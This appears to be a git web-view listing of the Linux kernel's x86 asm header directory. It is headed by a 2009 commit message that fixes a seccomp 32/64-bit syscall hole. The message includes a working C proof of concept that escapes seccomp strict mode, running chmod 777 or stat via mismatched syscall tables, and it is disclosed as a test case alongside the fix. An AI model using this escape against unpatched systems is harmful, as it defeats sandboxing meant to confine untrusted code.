Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  Conversely, a 64-bit process can make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
bigsmp
es7000 Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2009-01-10 06:13:09 -08:00
mach-default x86: fix apic.c build error on latest git 2009-01-12 19:24:23 +01:00
mach-generic x86: rename mp_config_table to mpc_table 2009-01-04 13:22:58 +01:00
mach-rdc321x
mach-voyager
numaq Merge branches 'x86/cleanups', 'x86/mpparse', 'x86/numa' and 'x86/uv' into x86/urgent 2009-01-06 17:39:52 +01:00
summit Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2009-01-10 06:13:09 -08:00
uv x86: uv_bau.h: fix dubious bitfield 2008-12-30 13:31:37 -08:00
visws
xen x86: don't apply __supported_pte_mask to non-present ptes 2009-02-04 21:33:09 -08:00
a.out-core.h x86: include correct %gs in a.out core dump 2009-02-09 14:56:37 +01:00
a.out.h
acpi.h
agp.h
alternative-asm.h
alternative.h
amd_iommu_types.h AMD IOMMU: add init code for statistic collection 2009-01-03 14:11:58 +01:00
amd_iommu.h
apic.h x86: apic.c: xapic_icr_read and x2apic_icr_read should be static 2008-12-30 13:31:28 -08:00
apicdef.h
arch_hooks.h
asm.h
atomic_32.h atomic_t: unify all arch definitions 2009-01-06 15:59:10 -08:00
atomic_64.h atomic_t: unify all arch definitions 2009-01-06 15:59:10 -08:00
atomic.h
auxvec.h
bios_ebda.h
bitops.h x86, generic: mark complex bitops.h inlines as __always_inline 2009-01-13 18:56:30 +01:00
boot.h
bootparam.h
bug.h
bugs.h
byteorder.h byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
cache.h
cacheflush.h
calgary.h
calling.h
checksum_32.h
checksum_64.h
checksum.h
cmpxchg_32.h
cmpxchg_64.h
cmpxchg.h
compat.h
cpu.h
cpufeature.h x86: add clflush before monitor for Intel 7400 series 2009-02-09 11:15:15 +01:00
cputime.h
current.h
debugreg.h
delay.h
desc_defs.h
desc.h x86: fix lguest used_vectors breakage, -v2 2008-12-23 22:37:28 +01:00
device.h
div64.h
dma-mapping.h Documentation: move DMA-mapping.txt to Doc/PCI/ 2009-01-29 18:19:29 -08:00
dma.h
dmi.h
ds.h
dwarf2.h
e820.h headers_check fix: x86, e820.h 2009-01-31 00:16:22 +05:30
edac.h
efi.h x86: efi.c declare add_efi_memmap before they get used 2008-12-29 18:17:32 +01:00
elf.h [S390] arch_setup_additional_pages arguments 2008-12-25 13:38:54 +01:00
emergency-restart.h
errno.h
fb.h
fcntl.h
fixmap_32.h
fixmap_64.h
fixmap.h
floppy.h
frame.h
ftrace.h
futex.h
gart.h
genapic_32.h x86: rename mpc_config_processor to mpc_cpu 2009-01-04 13:23:00 +01:00
genapic_64.h
genapic.h
geode.h
gpio.h
hardirq_32.h
hardirq_64.h
hardirq.h
highmem.h
hpet.h
hugetlb.h
hw_irq.h
hypertransport.h
hypervisor.h
i387.h
i8253.h
i8259.h
ia32_unistd.h
ia32.h
idle.h
intel_arch_perfmon.h
io_32.h
io_64.h
io_apic.h Merge branch 'irq-core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-30 16:20:19 -08:00
io.h x86: fix assumed to be contiguous leaf page tables for kmap_atomic region (take 2) 2009-01-16 13:47:04 +01:00
ioctl.h
ioctls.h
iomap.h gpu/drm, x86, PAT: io_mapping_create_wc and resource_size_t 2009-02-25 13:09:51 +01:00
iommu.h Merge branch 'core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-30 16:10:19 -08:00
ipcbuf.h
ipi.h
irq_regs_32.h
irq_regs_64.h
irq_regs.h
irq_remapping.h
irq_vectors.h
irq.h Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-cpumask into merge-rr-cpumask 2009-01-03 18:53:31 +01:00
irqflags.h
ist.h
k8.h
Kbuild byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
kdebug.h
kexec.h
kgdb.h
kmap_types.h
kprobes.h
kvm_host.h KVM: change KVM to use IOMMU API 2009-01-03 14:11:07 +01:00
kvm_para.h
kvm_x86_emulate.h KVM: x86 emulator: add Src2 decode set 2008-12-31 16:55:42 +02:00
kvm.h KVM: Avoid using CONFIG_ in userspace visible headers 2009-02-15 02:47:35 +02:00
ldt.h
lguest_hcall.h
lguest.h x86: cleanup some remaining usages of NR_CPUS where s/b nr_cpu_ids 2009-01-03 19:00:55 +01:00
linkage.h
local.h
math_emu.h x86: fix math_emu register frame access 2009-02-10 00:39:14 +01:00
mc146818rtc.h
mca_dma.h
mca.h
mce.h headers_check fix: x86, mce.h 2009-01-31 00:17:13 +05:30
microcode.h
mman.h
mmconfig.h
mmu_context_32.h
mmu_context_64.h
mmu_context.h
mmu.h
mmx.h
mmzone_32.h mm: clean up for early_pfn_to_nid() 2009-02-18 15:37:55 -08:00
mmzone_64.h mm: clean up for early_pfn_to_nid() 2009-02-18 15:37:55 -08:00
mmzone.h
module.h
mpspec_def.h x86: rename all fields of mpc_table mpc_X to X 2009-01-05 14:08:34 +01:00
mpspec.h x86: find nr_irqs_gsi with mp_ioapic_routing 2009-02-09 12:42:59 +01:00
msgbuf.h
msidef.h
msr-index.h x86: add MSR_IA32_MISC_ENABLE bits to <asm/msr-index.h> 2009-01-21 15:13:53 -08:00
msr.h Merge branch 'tracing-core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-28 12:21:10 -08:00
mtrr.h headers_check fix: x86, mtrr.h 2009-01-31 00:17:39 +05:30
mutex_32.h
mutex_64.h
mutex.h
nmi.h
nops.h
numa_32.h
numa_64.h
numa.h
numaq.h
olpc.h
page_32.h
page_64.h
page.h x86, pat: fix warn_on_once() while mapping 0-1MB range with /dev/mem 2009-02-12 08:27:27 +01:00
param.h
paravirt.h Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2009-02-17 14:27:39 -08:00
parport.h
pat.h
pci_32.h
pci_64.h
pci_x86.h x86, pci: move arch/x86/pci/pci.h to arch/x86/include/asm/pci_x86.h 2008-12-29 18:17:36 +01:00
pci-direct.h
pci.h Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux-2.6 2008-12-31 23:05:57 +10:30
pda.h
percpu.h
pgalloc.h x86, mm: fix pte_free() 2009-01-23 18:42:06 +01:00
pgtable_32.h
pgtable_64.h
pgtable-2level-defs.h
pgtable-2level.h
pgtable-3level-defs.h
pgtable-3level.h
pgtable.h x86: don't apply __supported_pte_mask to non-present ptes 2009-02-04 21:33:09 -08:00
poll.h
posix_types_32.h
posix_types_64.h
posix_types.h
prctl.h
processor-cyrix.h
processor-flags.h
processor.h x86: math_emu info cleanup 2009-02-09 14:56:39 +01:00
proto.h
ptrace-abi.h headers_check fix: x86, ptrace-abi.h 2009-01-31 00:18:03 +05:30
ptrace.h
pvclock-abi.h
pvclock.h
reboot_fixups.h
reboot.h
required-features.h
resource.h
resume-trace.h
rio.h
rtc.h
rwlock.h
rwsem.h
scatterlist.h
seccomp_32.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
seccomp_64.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
seccomp.h
sections.h
segment.h
sembuf.h
serial.h
setup.h x86: rename mpc_config_oemtable to mpc_oemtable 2009-01-04 13:23:02 +01:00
shmbuf.h
shmparam.h
sigcontext32.h headers_check fix: x86, sigcontext32.h 2009-01-31 00:18:58 +05:30
sigcontext.h headers_check fix: x86, sigcontext.h 2009-01-31 00:18:30 +05:30
sigframe.h
siginfo.h
signal.h
smp.h x86: cleanup remaining cpumask_t ops in smpboot code 2009-01-04 15:39:26 +01:00
socket.h
sockios.h
sparsemem.h
spinlock_types.h
spinlock.h x86: spinlocks: define dummy __raw_spin_is_contended 2009-02-09 08:15:39 -08:00
srat.h
stacktrace.h
stat.h
statfs.h
string_32.h
string_64.h
string.h
suspend_32.h
suspend_64.h
suspend.h
svm.h KVM: SVM: move svm.h to include/asm 2008-12-31 16:52:28 +02:00
swab.h headers_check fix: x86, swab.h 2009-01-31 00:19:32 +05:30
swiotlb.h swiotlb: replace architecture-specific swiotlb.h with linux/swiotlb.h 2008-12-28 10:04:00 +01:00
sync_bitops.h
sys_ia32.h x86: introducing asm/sys_ia32.h 2008-12-29 13:18:40 +01:00
syscall.h
syscalls.h Revert "x86: signal: change type of paramter for sys_rt_sigreturn()" 2009-01-21 09:43:18 +01:00
system_64.h
system.h
tce.h
termbits.h
termios.h
therm_throt.h
thread_info.h Merge branch 'tracing-core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-28 12:21:10 -08:00
time.h
timer.h
timex.h x86: use standard PIT frequency 2009-01-25 16:57:47 +01:00
tlb.h
tlbflush.h
topology.h Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-cpumask into merge-rr-cpumask 2009-01-03 18:53:31 +01:00
trampoline.h
traps.h x86: fix math_emu register frame access 2009-02-10 00:39:14 +01:00
tsc.h
types.h
uaccess_32.h
uaccess_64.h
uaccess.h Merge branch 'core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-30 16:10:19 -08:00
ucontext.h
unaligned.h
unistd_32.h
unistd_64.h
unistd.h
user32.h
user_32.h
user_64.h
user.h
vdso.h
vga.h
vgtod.h
vic.h
virtext.h x86: cpu_emergency_svm_disable() function 2008-12-31 16:52:30 +02:00
vm86.h
vmi_time.h
vmi.h
vmware.h
vmx.h KVM: VMX: move ASM_VMX_* definitions from asm/kvm_host.h to asm/vmx.h 2008-12-31 16:52:28 +02:00
voyager.h
vsyscall.h
xcr.h
xor_32.h
xor_64.h
xor.h
xsave.h